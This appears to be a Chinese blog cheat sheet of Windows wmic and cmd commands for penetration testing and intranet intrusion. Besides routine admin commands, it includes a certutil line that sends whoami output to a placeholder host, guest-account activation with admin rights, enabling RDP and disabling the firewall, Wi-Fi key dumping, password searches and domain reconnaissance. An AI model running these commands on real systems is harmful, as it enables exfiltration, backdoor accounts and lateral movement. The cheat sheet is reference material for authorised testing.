windows命令总结

前言

整理了一些命令,不只是wmic命令,也有其他的好玩命令。

wmic命令总结

查看计算机补丁安装详情

wmic qfe list

列出进程

wmic process list brief

获取进程路径

wmic process get description,executablepath
wmic process where name="java.exe" get executablepath

根据应用程序查找PID

wmic process where name="cmd.exe" get processid,executablepath,name

获取某个进程详情

wmic process where name="chrome.exe" list full

创建新进程

wmic process call create notepad
wmic process call create "C:\Program Files\Tencent\qq.exe"
wmic process call create "shutdown.exe -r -f -t 20"

删除指定进程

wmic process where name="qq.exe" call terminate
wmic process where processid="2316" delete
wmic process 2316 call terminate

查看启动项

wmic startup

查看共享

wmic share get name,path

查看安装的软件版本

wmic product get name,version

查看是否为虚拟机

wmic bios list full | find /i "vmware"

获取机器名

wmic path win32_computersystem get dnshostname

获取系统名称

wmic path win32_operatingsystem get name

查看系统32位还是64位

wmic path win32_operatingsystem get osarchitecture

获取系统域名

wmic path win32_computersystem get domain

获取AV详情

wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

base64编码

certUtil -encode 1.jsp 1.txt

base64解码

certUtil -decode 1.txt 1.jsp

cmd命令总结

输出结果到文件

net user > a.txt 2>&1

查看进程

tasklist /svc

删除进程

taskkill /f /im shell.exe

根据PID删除

taskkill /pid 5396 /F

路由跟踪

tracert IP

查询DNS

nslookup domain

查看登录用户

qwinsta

查看路由表

route print

查看计划任务

schtasks /query /fo list /v

类似vim命令,ctr+z退出,并创建成功

copy con  test.vbs

递归查找某个文件

cd /d E: && dir /b /s Logon.aspx

Dns 带外命令执行

for /f %i in ('whoami') do certutil -urlcache -split -f http://x.x.x.x/%i

命令执行不出网

cd c:\ && for /f %i in ('dir /s /b c:fastjson-1.2.47.jar') do (echo %i> %i.path.txt) & (ipconfig > %i.ipconfig.txt)

激活guest

net user guest /active:yes
net user guest Qax@123456
net  localgroup administrators guest  /add

递归查找文件内容

findstr /si password  config.*  *.ini *.txt     //查看后缀名文件中含有password关键字的文件

查看是否开启3389

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

0x1表示关闭,0x0表示开启

修改注册表开启3389

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

这里收集了两种。

查找TermService服务端口

tasklist /svc | findstr "TermService"
netstat -ano | find "PID"

批量扫描内网存活主机

for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"

批量net view 输出机器名和ip

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

批量查找B段存活主机,保存为批处理文件。

@echo off
for /l %%i in (1,1,255) do (
    for /l %%j in (1,25,255) do (
      @ ping -w 1 -n 1 10.0.%%i.%%j | find /i "ttl="
    )
)

关闭防火墙
windows server 2003 及之前的版本

netsh fiewall set opmode disable

windows server 2003 及之后的版本

netsh advfiewall set allprofiles state off

添加防火墙规则

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=6666

查看防火墙策略

netsh firewall show config
netsh firewall show state

查看无线密码

netsh wlan show profiles
netsh wlan show profiles name="profiles" key=clear

内网渗透

启用telnet

dism /online /Enable-Feature /FeatureName:TelnetClient

查看域控制器

net group "Domain controllers"

查看当前网络域环境

net view /domain

查看域内管理员

net group "domain admins" /domain

查看域内所有机器名

net group "domain computers" /domain

查找外网对应的内网资产

for /f "delims=" %i in (domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"test.com" >> service.txt

domains.txt为外网收集的域名,for循环ping域名,并将结果输出到service.txt
查找内网IP资产

for /f "delims=" %i in (web.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> out.txt

待补充......
参考资料
域渗透总结
WMIC后渗透利用
内网渗透常用命令总结
WMIC命令利用方式

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,684评论 6 478
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,143评论 2 381
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,214评论 0 337
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,788评论 1 277
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,796评论 5 368
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,665评论 1 281
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,027评论 3 399
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,679评论 0 258
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 41,346评论 1 299
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,664评论 2 321
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,766评论 1 331
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,412评论 4 321
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,015评论 3 307
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,974评论 0 19
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,203评论 1 260
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,073评论 2 350
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,501评论 2 343

推荐阅读更多精彩内容